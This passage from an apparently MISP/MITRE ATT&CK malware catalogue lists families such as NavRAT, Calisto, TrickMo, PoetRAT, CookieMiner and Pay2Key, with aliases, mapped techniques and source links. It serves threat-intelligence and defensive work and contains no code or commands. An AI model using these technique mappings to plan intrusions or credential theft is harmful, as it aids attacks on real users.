uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"

Table 4972. Table References
Links
https://attack.mitre.org/software/S0264
https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/
https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/

Ecipekac - S0624

[Ecipekac](https://attack.mitre.org/software/S0624) is a multi-layer loader that has been used by [menuPass](https://attack.mitre.org/groups/G0045) since at least 2019 including use as a loader for [P8RAT](https://attack.mitre.org/software/S0626), [SodaMaster](https://attack.mitre.org/software/S0627), and [FYAnti](https://attack.mitre.org/software/S0628).(Citation: Securelist APT10 March 2021)

The tag is: misp-galaxy:mitre-malware="Ecipekac - S0624"

Ecipekac - S0624 is also known as:

Ecipekac
HEAVYHAND
SigLoader
DESLoader

View relationships graph

Ecipekac - S0624 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"

Table 4973. Table References
Links
https://attack.mitre.org/software/S0624
https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/

NavRAT - S0247

[NavRAT](https://attack.mitre.org/software/S0247) is a remote access tool designed to upload, download, and execute files. It has been observed in attacks targeting South Korea. (Citation: Talos NavRAT May 2018)

The tag is: misp-galaxy:mitre-malware="NavRAT - S0247"

NavRAT - S0247 is also known as:

NavRAT

View relationships graph

NavRAT - S0247 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"

Table 4974. Table References
Links
https://attack.mitre.org/software/S0247
https://blog.talosintelligence.com/2018/05/navrat.html

Calisto - S0274

[Calisto](https://attack.mitre.org/software/S0274) is a macOS Trojan that opens a backdoor on the compromised machine. [Calisto](https://attack.mitre.org/software/S0274) is believed to have first been developed in 2016. (Citation: Securelist Calisto July 2018) (Citation: Symantec Calisto July 2018)

The tag is: misp-galaxy:mitre-malware="Calisto - S0274"

Calisto - S0274 is also known as:

Calisto

View relationships graph

Calisto - S0274 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keychain - T1555.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Bookmark Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launchctl - T1569.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"

Table 4975. Table References
Links
https://attack.mitre.org/software/S0274
https://securelist.com/calisto-trojan-for-macos/86543/
https://www.symantec.com/security-center/writeup/2018-073014-2512-99?om_rssid=sr-latestthreats30days

TrickMo - S0427

[TrickMo](https://attack.mitre.org/software/S0427) a 2FA bypass mobile banking trojan, most likely being distributed by [TrickBot](https://attack.mitre.org/software/S0266). [TrickMo](https://attack.mitre.org/software/S0427) has been primarily targeting users located in Germany.(Citation: SecurityIntelligence TrickMo)

[TrickMo](https://attack.mitre.org/software/S0427) is designed to steal transaction authorization numbers (TANs), which are typically used as one-time passwords.(Citation: SecurityIntelligence TrickMo)

The tag is: misp-galaxy:mitre-malware="TrickMo - S0427"

TrickMo - S0427 is also known as:

TrickMo

View relationships graph

TrickMo - S0427 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Injection - T1516" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Alternate Network Mediums - T1438" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uninstall Malicious Application - T1576" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

Table 4976. Table References
Links
https://attack.mitre.org/software/S0427
https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/

down_new - S0472

[down_new](https://attack.mitre.org/software/S0472) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)

The tag is: misp-galaxy:mitre-malware="down_new - S0472"

down_new - S0472 is also known as:

down_new

View relationships graph

down_new - S0472 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 4977. Table References
Links
https://attack.mitre.org/software/S0472
https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf

PoetRAT - S0428

[PoetRAT](https://attack.mitre.org/software/S0428) is a remote access trojan (RAT) that was first identified in April 2020. [PoetRAT](https://attack.mitre.org/software/S0428) has been used in multiple campaigns against the private and public sectors in Azerbaijan, including ICS and SCADA systems in the energy sector. The STIBNITE activity group has been observed using the malware. [PoetRAT](https://attack.mitre.org/software/S0428) derived its name from references in the code to poet William Shakespeare. (Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)(Citation: Dragos Threat Report 2020)

The tag is: misp-galaxy:mitre-malware="PoetRAT - S0428"

PoetRAT - S0428 is also known as:

PoetRAT

View relationships graph

PoetRAT - S0428 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Transfer Protocols - T1071.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 4978. Table References
Links
https://attack.mitre.org/software/S0428
https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html
https://blog.talosintelligence.com/2020/10/poetrat-update.html
https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770

Bundlore - S0482

[Bundlore](https://attack.mitre.org/software/S0482) is adware written for macOS that has been in use since at least 2015. Though categorized as adware, [Bundlore](https://attack.mitre.org/software/S0482) has many features associated with more traditional backdoors.(Citation: MacKeeper Bundlore Apr 2019)

The tag is: misp-galaxy:mitre-malware="Bundlore - S0482"

Bundlore - S0482 is also known as:

Bundlore
OSX.Bundlore

View relationships graph

Bundlore - S0482 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SSH Authorized Keys - T1098.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"

Table 4979. Table References
Links
https://attack.mitre.org/software/S0482
https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/

More_eggs - S0284

[More_eggs](https://attack.mitre.org/software/S0284) is a JScript backdoor used by [Cobalt Group](https://attack.mitre.org/groups/G0080) and [FIN6](https://attack.mitre.org/groups/G0037). Its name was given based on the variable "More_eggs" being present in its code. There are at least two different versions of the backdoor being used, version 2.0 and version 4.4. (Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)

The tag is: misp-galaxy:mitre-malware="More_eggs - S0284"

More_eggs - S0284 is also known as:

More_eggs
SKID
Terra Loader
SpicyOmelette

View relationships graph

More_eggs - S0284 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internet Connection Discovery - T1016.001" with estimative-language:likelihood-probability="almost-certain"

Table 4980. Table References
Links
https://attack.mitre.org/software/S0284
https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html
https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/
https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf

yty - S0248

[yty](https://attack.mitre.org/software/S0248) is a modular, plugin-based malware framework. The components of the framework are written in a variety of programming languages. (Citation: ASERT Donot March 2018)

The tag is: misp-galaxy:mitre-malware="yty - S0248"

yty - S0248 is also known as:

View relationships graph

yty - S0248 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"

Table 4981. Table References
Links
https://attack.mitre.org/software/S0248
https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/

ShiftyBug - S0294

[ShiftyBug](https://attack.mitre.org/software/S0294) is an auto-rooting adware family of malware for Android. The family is very similar to the other Android families known as Shedun, Shuanet, Kemoge, though it is not believed all the families were created by the same group. (Citation: Lookout-Adware)

The tag is: misp-galaxy:mitre-malware="ShiftyBug - S0294"

ShiftyBug - S0294 is also known as:

ShiftyBug

View relationships graph

ShiftyBug - S0294 has relationships with:

similar: misp-galaxy:android="Kemoge" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"

Table 4982. Table References
Links
https://attack.mitre.org/software/S0294
https://blog.lookout.com/blog/2015/11/04/trojanized-adware/

CookieMiner - S0492

[CookieMiner](https://attack.mitre.org/software/S0492) is mac-based malware that targets information associated with cryptocurrency exchanges as well as enabling cryptocurrency mining on the victim system itself. It was first discovered in the wild in 2019.(Citation: Unit42 CookieMiner Jan 2019)

The tag is: misp-galaxy:mitre-malware="CookieMiner - S0492"

CookieMiner - S0492 is also known as:

CookieMiner

View relationships graph

CookieMiner - S0492 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 4983. Table References
Links
https://attack.mitre.org/software/S0492
https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

Pay2Key - S0556

[Pay2Key](https://attack.mitre.org/software/S0556) is a ransomware written in C++ that has been used by [Fox Kitten](https://attack.mitre.org/groups/G0117) since at least July 2020 including campaigns against Israeli companies. [Pay2Key](https://attack.mitre.org/software/S0556) has been incorporated with a leak site to display stolen sensitive information to further pressure victims into payment.(Citation: ClearkSky Fox Kitten February 2020)(Citation: Check Point Pay2Key November 2020)

The tag is: misp-galaxy:mitre-malware="Pay2Key - S0556"

Pay2Key - S0556 is also known as:

Pay2Key

View relationships graph

Pay2Key - S0556 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 4984. Table References
Links
https://attack.mitre.org/software/S0556
https://www.clearskysec.com/fox-kitten/
https://research.checkpoint.com/2020/ransomware-alert-pay2key/

DDKONG - S0255

[DDKONG](https://attack.mitre.org/software/S0255) is a malware sample that was part of a campaign by [Rancor](https://attack.mitre.org/groups/G0075). [DDKONG](https://attack.mitre.org/software/S0255) was first seen used in February 2017. (Citation: Rancor Unit42 June 2018)

The tag is: misp-galaxy:mitre-malware="DDKONG - S0255"

DDKONG - S0255 is also known as:

DDKONG

View relationships graph

DDKONG - S0255 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4985. Table References
Links
https://attack.mitre.org/software/S0255
https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

MarkiRAT - S0652

[MarkiRAT](https://attack.mitre.org/software/S0652) is a remote access Trojan (RAT) compiled with Visual Studio that has been used by [Ferocious Kitten](https://attack.mitre.org/groups/G0137) since at least 2015.(Citation: Kaspersky Ferocious Kitten Jun 2021)

The tag is: misp-galaxy:mitre-malware="MarkiRAT - S0652"

MarkiRAT - S0652 is also known as:

MarkiRAT

View relationships graph

